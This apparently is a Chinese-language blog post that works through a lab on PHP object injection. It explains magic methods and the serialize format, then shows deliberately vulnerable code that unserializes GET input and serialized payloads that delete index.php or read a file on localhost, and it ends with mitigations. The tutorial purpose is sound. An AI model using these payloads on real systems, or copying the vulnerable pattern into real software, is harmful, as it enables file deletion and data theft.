<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">



  <link rel="icon" type="image/png" sizes="32x32" href="/images/logo.jpg?v=5.1.4">







  <meta name="keywords" content="信安,">










<meta name="description" content="php反序列化漏洞关于php面向对象编程：对象：可以对其做事情的一些东西。一个对象有状态、行为和标识三种属性。类：一个共享相同结构和行为的对象的集合。">
<meta name="keywords" content="信安">
<meta property="og:type" content="article">
<meta property="og:title" content="php反序列化漏洞">
<meta property="og:url" content="http://yoursite.com/2019/03/10/php反序列化漏洞/index.html">
<meta property="og:site_name" content="Blog">
<meta property="og:description" content="php反序列化漏洞关于php面向对象编程：对象：可以对其做事情的一些东西。一个对象有状态、行为和标识三种属性。类：一个共享相同结构和行为的对象的集合。">
<meta property="og:locale" content="default">
<meta property="og:image" content="https://i.imgur.com/guLOH1f.png">
<meta property="og:image" content="https://i.imgur.com/NDO9BgV.png">
<meta property="og:image" content="https://i.imgur.com/xqptPaj.png">
<meta property="og:image" content="https://i.imgur.com/R8FYHxw.png">
<meta property="og:image" content="https://i.imgur.com/TT9YH0X.png">
<meta property="og:image" content="https://i.imgur.com/2tEMjLz.png">
<meta property="og:image" content="https://i.imgur.com/sZGV30O.png">
<meta property="og:image" content="https://i.imgur.com/DbXiOQ4.png">
<meta property="og:image" content="https://i.imgur.com/ThaMPRB.png">
<meta property="og:image" content="https://i.imgur.com/PAgETdt.png">
<meta property="og:image" content="https://i.imgur.com/nR9Srtl.png">
<meta property="og:image" content="https://i.imgur.com/p5mph7Z.png">
<meta property="og:updated_time" content="2019-03-12T04:37:08.790Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="php反序列化漏洞">
<meta name="twitter:description" content="php反序列化漏洞关于php面向对象编程：对象：可以对其做事情的一些东西。一个对象有状态、行为和标识三种属性。类：一个共享相同结构和行为的对象的集合。">
<meta name="twitter:image" content="https://i.imgur.com/guLOH1f.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/03/10/php反序列化漏洞/">





  <title>php反序列化漏洞 | Blog</title>
  








</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">虽然我是个菜鸟，但我是个有理想的菜鸟</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            About
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/03/10/php反序列化漏洞/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Vergilben">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/loco.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">php反序列化漏洞</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-03-10T17:53:13+08:00">
                2019-03-10
              </time>
            

            
              <span class="post-meta-divider">|</span>
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-check-o"></i>
              </span>
              
                <span class="post-meta-item-text">Post modified&#58;</span>
              
              <time title="Post modified" itemprop="dateModified" datetime="2019-03-12T12:37:08+08:00">
                2019-03-12
              </time>
            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="php反序列化漏洞"><a href="#php反序列化漏洞" class="headerlink" title="php反序列化漏洞"></a>php反序列化漏洞</h1><p>关于php面向对象编程：<br>对象：可以对其做事情的一些东西。一个对象有<strong>状态、行为和标识</strong>三种属性。<br>类：一个共享相同结构和行为的对象的集合。<a id="more"></a><br>每个类的定义都以关键字class开头，后面跟着类的名字。一个类可以包含有属于自己的变量，变量（称为“属性”）以及函数（“称为方法”）。类定义了一件事物的抽象特点。通常来说，类定义了事物的属性和它可以做到的。类可能会包含一些特殊的函数叫magic函数，magic函数命名是以符号“_”开头的，比如<code>_construct</code>,<code>_destruct</code>,<code>_toString</code>,<code>_sleep</code>,<code>_wakeup</code>等。这些函数在某些情况下会自动调用，比如：_construct当一个对象创建时调用（constructor）；_destruct当一个对象被销毁时调用（destructor）；_toString当一个对象被当作一个字符串时使用。</p>
<h2 id="了解php对象概念以及php对象的一些简单特性"><a href="#了解php对象概念以及php对象的一些简单特性" class="headerlink" title="了解php对象概念以及php对象的一些简单特性"></a>了解php对象概念以及php对象的一些简单特性</h2><p>我们先创建一个简单的php对象：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">class TestClass</span><br><span class="line">&#123;</span><br><span class="line">//一个变量</span><br><span class="line">public $variable = &apos;This is a string&apos;;</span><br><span class="line">//一个简单的方法</span><br><span class="line">public function PrintVariable()</span><br><span class="line">&#123;</span><br><span class="line">echo $this-&gt;variable;</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br><span class="line">//创建一个对象</span><br><span class="line">$object = new TestClass();</span><br><span class="line">//调用一个方法</span><br><span class="line">$object-&gt;PrintVariable();</span><br><span class="line">?&gt;</span><br><span class="line">//test.php</span><br></pre></td></tr></table></figure></p>
<p>运行结果如下：<br><img src="https://i.imgur.com/guLOH1f.png" alt=""><br>接下来开始尝试使用magic函数，在类中添加一个magic函数：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">class TestClass</span><br><span class="line">&#123;</span><br><span class="line">    //一个变量</span><br><span class="line">    public $variable = &apos;This is a string&apos;;</span><br><span class="line">    //一个简单的方法</span><br><span class="line">    public function PrintVariable()</span><br><span class="line">    &#123;</span><br><span class="line">        echo $this-&gt;variable.&apos;&lt;br /&gt;&apos;;</span><br><span class="line">    &#125;</span><br><span class="line">    //Constructor</span><br><span class="line">    public function  __construct()</span><br><span class="line">    &#123;</span><br><span class="line">        echo &apos;__construct&lt;br /&gt;&apos;;</span><br><span class="line">    &#125;</span><br><span class="line">    //Destructor</span><br><span class="line">    public function __destruct()</span><br><span class="line">    &#123;</span><br><span class="line">        echo &apos;__destruct&lt;br /&gt;&apos;;</span><br><span class="line">    &#125;</span><br><span class="line">    //call</span><br><span class="line">    public function __toString()</span><br><span class="line">    &#123;</span><br><span class="line">        return &apos;__toString&lt;br /&gt;&apos;;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">//创建一个对象</span><br><span class="line">//__construct会被调用</span><br><span class="line">$object = new TestClass();</span><br><span class="line">//创建一个方法</span><br><span class="line">//‘This is a string’将会被输出</span><br><span class="line">$object-&gt;PrintVariable();</span><br><span class="line">//对象被当作一个字符串</span><br><span class="line">//toString会被调用</span><br><span class="line">echo $object;</span><br><span class="line">//php脚本要结束时，__destruct会被调用</span><br><span class="line">?&gt;</span><br><span class="line">//test1.php</span><br></pre></td></tr></table></figure></p>
<p>再来看一下这次：<br><img src="https://i.imgur.com/NDO9BgV.png" alt=""><br>从结果看，这几个magic函数依次被调用了，这个旨在帮助我们理解php的magic函数。</p>
<h2 id="了解什么是php序列化以及序列化的一些格式"><a href="#了解什么是php序列化以及序列化的一些格式" class="headerlink" title="了解什么是php序列化以及序列化的一些格式"></a>了解什么是php序列化以及序列化的一些格式</h2><p>在传递变量的过程中，有可能遇到变量值要跨脚本文件传递的过程。如果一个脚本中想要的调用之前一个脚本的变量，但是之前一个脚本已经执行完毕，所有的变量和内容释放掉了，那该如何操作呢？serialize和unserialize就是解决这一问题的存在，serialize可以将变量转换为字符串，并且在转换的过程中可以保存当前变量的值，而unserialize则可以将serialize生成的字符串转换回变量。通俗来说：通过反序列化在特定条件下可以重建php对象并执行php对象中某些magic函数。我们通过例子来看php对象序列化之后的格式，代码如下：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">//一个类</span><br><span class="line">class User</span><br><span class="line">&#123;</span><br><span class="line">    //类的数据</span><br><span class="line">    public $age = 0;</span><br><span class="line">    public $name = &apos;&apos;;</span><br><span class="line">    //输出数据</span><br><span class="line">    public function printdata()</span><br><span class="line">    &#123;</span><br><span class="line">        echo &apos;User &apos;.$this-&gt;name.&apos; is &apos;.$this-&gt;age.&apos; years old.&lt;br /&gt;&apos;;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">//创建一个对象</span><br><span class="line">$usr = new User();</span><br><span class="line">//设置数据</span><br><span class="line">$usr-&gt;age = 18;</span><br><span class="line">$usr-&gt;name = &apos;vergilben&apos;;</span><br><span class="line">//输出数据</span><br><span class="line">$usr-&gt;printdata();</span><br><span class="line">//输出序列化后的数据</span><br><span class="line">echo serialize($usr)</span><br><span class="line">?&gt;</span><br><span class="line">//test2.php</span><br></pre></td></tr></table></figure></p>
<p>结果如下：<br><img src="https://i.imgur.com/xqptPaj.png" alt=""><br>下面的O:4:”User”:2:{s:3:”age”;i:18;s:4:”name”;s:9:”vergilben”;}就是对象user序列化后的形式，“O”表示对象，“4”表示对象名长度为4，“User”为对象名，“2”表示有2个参数。“{}”里面是参数的key和value，“s”表示string对象，“3”表示长度，“age”则为key；“i”是interger对象，“18”是value，后面的都是相同的道理。接下来我们进行反序列化试一试，代码如下：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">//一个类</span><br><span class="line">class User</span><br><span class="line">&#123;</span><br><span class="line">    //类的数据</span><br><span class="line">    public $age = 0;</span><br><span class="line">    public $name = &apos;&apos;;</span><br><span class="line">    //输出数据</span><br><span class="line">    public function printdata()</span><br><span class="line">    &#123;</span><br><span class="line">        echo &apos;User &apos;.$this-&gt;name.&apos; is &apos;.$this-&gt;age.&apos; years old.&lt;br /&gt;&apos;;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">//重建对象</span><br><span class="line">$usr = unserialize(&apos;O:4:&quot;User&quot;:2:&#123;s:3:&quot;age&quot;;i:18;s:4:&quot;name&quot;;s:9:&quot;vergilben&quot;;&#125;&apos;);</span><br><span class="line">//输出数据</span><br><span class="line">$usr-&gt;printdata();</span><br><span class="line">?&gt;</span><br><span class="line">//test3.php</span><br></pre></td></tr></table></figure></p>
<p>运行：<br><img src="https://i.imgur.com/R8FYHxw.png" alt=""><br>可以看到，上次序列化的结果被转变成正常的语句了。</p>
<h2 id="明白php对象注入的成因"><a href="#明白php对象注入的成因" class="headerlink" title="明白php对象注入的成因"></a>明白php对象注入的成因</h2><p>我们知道magic函数是php对象的特殊函数，在某些特殊情况下会被调用，这下特殊情况当然包含serialize和unserialize。<br><strong>sleep magic方法在一个对象被序列化时调用，</strong>wakeup magic方法在一个对象被反序列化时调用。下面解释一下：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">class test</span><br><span class="line">&#123;</span><br><span class="line">    public $variable = &apos;BUZZ&apos;;</span><br><span class="line">    public $variable2 = &apos;OTHER&apos;;</span><br><span class="line">    public function printvariable()</span><br><span class="line">    &#123;</span><br><span class="line">        echo $this-&gt;variable.&apos;&lt;br /&gt;&apos;;</span><br><span class="line">    &#125;</span><br><span class="line">    public function __construct()</span><br><span class="line">    &#123;</span><br><span class="line">        echo &apos;__construct&apos;.&apos;&lt;br /&gt;&apos;;</span><br><span class="line">    &#125;</span><br><span class="line">    public function __destruct()</span><br><span class="line">    &#123;</span><br><span class="line">        echo &apos;__destruct&apos;.&apos;&lt;br /&gt;&apos;;</span><br><span class="line">    &#125;</span><br><span class="line">    public function __wakeup()</span><br><span class="line">    &#123;</span><br><span class="line">        echo &apos;__wakeup&apos;.&apos;&lt;br /&gt;&apos;;</span><br><span class="line">    &#125;</span><br><span class="line">    public function __sleep()</span><br><span class="line">    &#123;</span><br><span class="line">        echo &apos;__sleep&apos;.&apos;&lt;br /&gt;&apos;;</span><br><span class="line">        return array(&apos;variable&apos;,&apos;variable2&apos;);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">//创建一个对象，回调用__construct</span><br><span class="line">$object = new test();</span><br><span class="line">//序列化一个对象，会调用__sleep</span><br><span class="line">$serialized = serialize($object);</span><br><span class="line">//输出序列化后的字符串</span><br><span class="line">print &apos;Serialized:&apos;.$serialized.&apos;&lt;br /&gt;&apos;;</span><br><span class="line">//重建对象，会调用__wakeup</span><br><span class="line">$object2 = unserialize($serialized);</span><br><span class="line">//调用printvariable,会输出数据(BUZZ)</span><br><span class="line">$object2-&gt;printvariable();</span><br><span class="line">//脚本结束，会调用__destruct</span><br><span class="line">?&gt;</span><br><span class="line">//test4.php</span><br></pre></td></tr></table></figure></p>
<p>运行：<br><img src="https://i.imgur.com/TT9YH0X.png" alt=""><br>可以看到serialize时调用了<strong>sleep，unserialize时调用了</strong>wakeup，在对象被销毁的时候用了<strong>destruce。<br>存在漏洞的思路：一个类用于临时将日志储存进某个文件，当</strong>destruct被调用时，日志文件将会被删除，比如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">class logfile</span><br><span class="line">&#123;</span><br><span class="line">    //log文件名</span><br><span class="line">    public $filename = &apos;error.log&apos;;</span><br><span class="line">    //一些用于储存日志的代码</span><br><span class="line">    public function logdata($text)</span><br><span class="line">    &#123;</span><br><span class="line">        echo &apos;log data:&apos;.$text.&apos;&lt;br /&gt;&apos;;</span><br><span class="line">        file_put_contents($this-&gt;filename,$text,FILE_APPEND);</span><br><span class="line">    &#125;</span><br><span class="line">    //destrcuctor 删除日志文件</span><br><span class="line">    public function __destruct()</span><br><span class="line">    &#123;</span><br><span class="line">        echo &apos;__destruct deletes &apos;.$this-&gt;filename.&apos;file.&lt;br /&gt;&apos;;</span><br><span class="line">        unlink(dirname(__FILE__).&apos;/&apos;.$this-&gt;filename);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br><span class="line">//test5.php</span><br></pre></td></tr></table></figure>
<p>调用这个类：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">include &apos;test5.php&apos;</span><br><span class="line">class User</span><br><span class="line">&#123;</span><br><span class="line">    //类数据</span><br><span class="line">    public $age = 0;</span><br><span class="line">    public $name = &apos;&apos;;</span><br><span class="line">    //输出数据</span><br><span class="line">    public function printdata()</span><br><span class="line">    &#123;</span><br><span class="line">        echo &apos;User &apos;.$this-&gt;name.&apos; is&apos;.$this-&gt;age.&apos; years old.&lt;br /&gt;&apos;;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">//重建数据</span><br><span class="line">$usr = unserialize($_GET[&apos;usr_serialized&apos;]);</span><br><span class="line">?&gt;</span><br><span class="line">//一个示例代码</span><br></pre></td></tr></table></figure></p>
<p>从代码中可以看到：$usr = unserialize($_GET[‘usr_serialized’]);$_GET[‘usr_serialized’]是可控的，那么我们就可以构造输入删除任意文件<br>构造输入删除目录下的index.php文件：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">include &apos;test5.php&apos;;</span><br><span class="line">$object = new logfile();</span><br><span class="line">$object-&gt;filename = &apos;index.php&apos;;</span><br><span class="line"></span><br><span class="line">echo serialize($object).&apos;&lt;br /&gt;&apos;;</span><br><span class="line"></span><br><span class="line">?&gt;</span><br><span class="line">//test7.php</span><br></pre></td></tr></table></figure></p>
<p>接下来先进入index.php：<br><img src="https://i.imgur.com/2tEMjLz.png" alt=""><br>接下来尝试使用test7.php删除了index.php，进入test7.php:<br><img src="https://i.imgur.com/sZGV30O.png" alt=""><br>现在在目录里已经没有了index.php:<br><img src="https://i.imgur.com/DbXiOQ4.png" alt=""><br>我们再次访问一下test7.php试一试：<br><img src="https://i.imgur.com/ThaMPRB.png" alt=""><br>index.php已经没有了。<br>这是一个简单的示例。</p>
<h2 id="常见的注入点"><a href="#常见的注入点" class="headerlink" title="常见的注入点"></a>常见的注入点</h2><p>上一部分展示了由于输入可控造成的<strong>destruct函数删除任意文件，其实问题也可能存在于</strong>wakeup、<strong>sleep、</strong>toString等其他magic函数，一切都取决于程序逻辑。比如，某用户类定义了一个<strong>toString，为了让应用程序能够将类作为一个字符串输出（echo $object），而且其他类也可能定义了一个类允许</strong>toString读取某个文件。<br>现在开始这个小实验，代码如下：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">include &apos;test9.php&apos;;</span><br><span class="line">$fileobj = new fileclass();</span><br><span class="line">$fileobj-&gt;filename = &apos;hello.txt&apos;;</span><br><span class="line"></span><br><span class="line">echo serialize($fileobj);</span><br><span class="line">?&gt;</span><br><span class="line">//test8.php</span><br></pre></td></tr></table></figure></p>
<p>我们先访问test8.php，结果如下：<br><img src="https://i.imgur.com/PAgETdt.png" alt=""></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">class fileclass</span><br><span class="line">&#123;</span><br><span class="line">    //文件名</span><br><span class="line">    public $filename = &apos;error.log&apos;;</span><br><span class="line">    //当对象被作为一个字符串会读取这个文件</span><br><span class="line">    public function __toString()</span><br><span class="line">    &#123;</span><br><span class="line">        return file_get_contents($this-&gt;filename);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class user</span><br><span class="line">&#123;</span><br><span class="line">    //class data</span><br><span class="line">    public $age = 0;</span><br><span class="line">    public $name = &apos;&apos;;</span><br><span class="line">    //允许对象作为一个字符串输出上面的data</span><br><span class="line">    public function __toString()</span><br><span class="line">    &#123;</span><br><span class="line">        return &apos;user &apos;.$this-&gt;name.&apos; is &apos;.$this-&gt;age.&apos; years old.&lt;br /&gt;&apos;;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">//用户可控</span><br><span class="line">$obj = unserialize($_GET[&apos;usr_serialized&apos;]);</span><br><span class="line">//输出__toString</span><br><span class="line">echo $obj</span><br><span class="line">?&gt;</span><br><span class="line">//test9.php</span><br></pre></td></tr></table></figure>
<p>接下来我们出发反序列化漏洞，获取hello.txt的内容：<br>构造url：<a href="http://localhost/test9.php?usr_serialized=O:9:%22fileclass%22:1:{s:8:%22filename%22;s:9:%22hello.txt%22;}，访问：" target="_blank" rel="noopener">http://localhost/test9.php?usr_serialized=O:9:%22fileclass%22:1:{s:8:%22filename%22;s:9:%22hello.txt%22;}，访问：</a><br><img src="https://i.imgur.com/nR9Srtl.png" alt=""><br>我们看一下hello.txt的内容：<br><img src="https://i.imgur.com/p5mph7Z.png" alt=""></p>
<p>注意：这仅仅是个小实验，在真实环境下没有这么容易，要仔细分析提供的代码找出漏洞。</p>
<h2 id="知识补充"><a href="#知识补充" class="headerlink" title="知识补充"></a>知识补充</h2><p>unserialize漏洞依赖几个条件：</p>
<ol>
<li>unserialize函数的参数可控</li>
<li>脚本中存在一个构造函数（<strong>construct()）、析构函数（</strong>destruct()）、__wakeup()函数中有向php文件中写数据的操作的类</li>
<li>所写的内容需要有对象中的成员变量的值</li>
</ol>
<p>防范的方法有：</p>
<ol>
<li>严格控制unserialize函数的参数，坚持用户所输入的信息都是不可靠的原则</li>
<li>对于unserialize后的变量内容进行检查，以确定内容没有被污染</li>
</ol>
<p>总结一下：实验展示了利用反序列化漏洞读写文件甚至删除文件，这个实验对我来说还是有点难度的，因为我的php还不是很好，但是坚持做下来了，所以这次打8分吧，前几次的毛病有改进，一分扣在时间，一分扣在思维逻辑有点混乱，继续加油吧~</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/信安/" rel="tag"># 信安</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/03/09/文件上传注入攻击/" rel="next" title="文件上传注入攻击">
                <i class="fa fa-chevron-left"></i> 文件上传注入攻击
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/03/12/LFI漏洞/" rel="prev" title="LFI漏洞">
                LFI漏洞 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/loco.jpg" alt="Vergilben">
            
              <p class="site-author-name" itemprop="name">Vergilben</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">13</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">4</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
